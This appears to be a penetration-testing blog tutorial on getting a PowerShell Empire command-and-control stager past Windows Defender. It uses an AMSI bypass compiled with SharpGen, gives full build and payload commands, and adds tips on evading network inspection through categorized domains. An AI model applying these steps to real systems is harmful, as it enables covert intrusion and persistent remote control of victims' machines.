Carrie Roberts//* (Updated 2/26/2019)
Note: Windows Defender added a detection on 2/25/2019 which now detects this method as “AmsiTamper.A”
Windows Defender does a good job of blocking many attacks including attempts to establish Command & Control (C2) sessions with published tools like PowerShell Empire. I was recently looking for a way to establish such a C2 session on a Windows 10 computer with Windows Defender enabled. I found a project called SharpSploit by Ryan Cobb @cobbr_io that did the trick. SharpSploit combines a lot of other important work by other security researchers into one tool and does it with C# code instead of using PowerShell.exe. This technique helps to avoid some common detections around malicious PowerShell activity.
Of particular interest to our goal at hand is the PowerShellExecute method described in the SharpSploit Quick Command Reference.
Cool! It uses Matt Graeber’s (@mattifestation) AMSI bypass and Lee Christensen’s (@tifkin_) PowerShell logging bypass too. That’s handy! The key piece here for bypassing Windows Defender with our payload is the AMSI bypass.
OK, so let’s get started with the steps for how to get that PowerShell Empire payload past Anti-Virus solutions like Windows Defender.
We are going to use SharpGen, also developed by @cobbr_io as a way to package up the SharpSploit functionality we want inside of an executable file. As a pre-requisite to building our executable you will need to install the .NET Core SDK which you can find here.
Windows Defender does not get a warm and cozy feeling about the files in the SharpGen github repo. If you are following these steps on a system with Windows Defender you should add a folder to the exceptions list in the Windows Defender settings. From within this folder you can work with the SharpGen code without interference. Now, pull down the SharpGen code from github (into your folder not being protected by Windows Defender). You can use Git For Windows to run this command:
git clone https://github.com/cobbr/SharpGen.git
SharpGen comes bundled with PowerKatz, which will get compiled into the final executable and Windows Defender will still block the executable. Since our goal is not to run Mimikatz (via PowerKatz), we will disable it by editing the resources.yml in the SharpGen/Resources folder as follows:
After ensuring that each “Enabled” field is set to false in the resources.yml file we are ready to build the SharpGen DLL.
dotnet build -c Release
This gives a bin/Release/netcoreapp2.1 directory with the SharpGen.dll file we need for the next step. For a simple example, we will first build an executable that prints “hi” to the screen using “Write-Output”
dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f example.exe -d net40 "Console.WriteLine(Shell.PowerShellExecute(\"Write-Output hi\"));"
You will now find the executable to run on your victim system in the Output folder. The “-d net40” option in the command above targets .Net 4.0, you can change this to “-d net35” to target .Net 3.5 if this is what your victim system is running.
Running our example.exe will simply print “hi” to the screen. If you run the executable by clicking on it this will happen so fast you won’t even see it. I recommend you run the executable from cmd.exe as shown below so you can see the output.
To reach our final goal we are going to build an executable to run our PowerShell one-liner for establishing a C2 connection with Empire. We generate the one-liner using the multi/launcher stager in PowerShell Empire (some hints on how to do that here). All we need is the base64 string to copy and paste into this command.
dotnet bin/Release/netcoreapp2.1/SharpGen.dll -f Launcher.exe -d net40 "Console.WriteLine(Shell.PowerShellExecute(\"$c = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('<BASE64_LAUNCHER>')); invoke-expression -command $c\"));"
Replace <BASE64_LAUNCHER> with the base64 string output by Empire’s multi/launcher (the stuff after “powershell -noP -sta -w 1 -enc”, including any equals signs at the end).
You will find Launcher.exe in the Output directory. Move this to your victim system and voila! You have gotten past Windows Defender.
However, this is probably not the only defense in a corporate environment that you need to get past. For example, there may be network defenses that will inspect the network traffic and shutdown the communication. Here are some tips for success.
- Use HTTPS communications over port 443, using valid (not self-signed) certificates. More information on how to set this up with Empire is located here.
- Change any default values, like DefaultJitter and DefaultProfile when starting your Empire Listener.
- Use an aged (not recently purchased) and categorized domain. In fact, if you use a domain that is categorized as Government, Health Care or Financial you might even avoid getting your traffic decrypted and inspected. Detect-SSLmitm is a PowerShell script that you can run on the victim system to determine which websites are being SSL decrypted. If you find that sites categorized as financial are not being decrypted, use a domain from that category. You can buy a domain, host some believable pages on it and apply for categorization (time-consuming). Or, you can buy a domain that has already been categorized but is now available for purchase. A tool like Domain Hunter, Joe Vest (@joevest) & Andrew Chiles (@andrewchiles), can help you locate such a domain.
- If application whitelisting is in play, preventing you from running random executables, try one of many application whitelisting bypasses. Here is one example by @fullmetalcache that I’ve used successfully in the past.
— Thanks to Carrie for another awesome guest blog post here on the BHIS Blog!
For Penetration Testing, Security Assessments, Red Team Engagements, and Threat Hunting: Contact Us!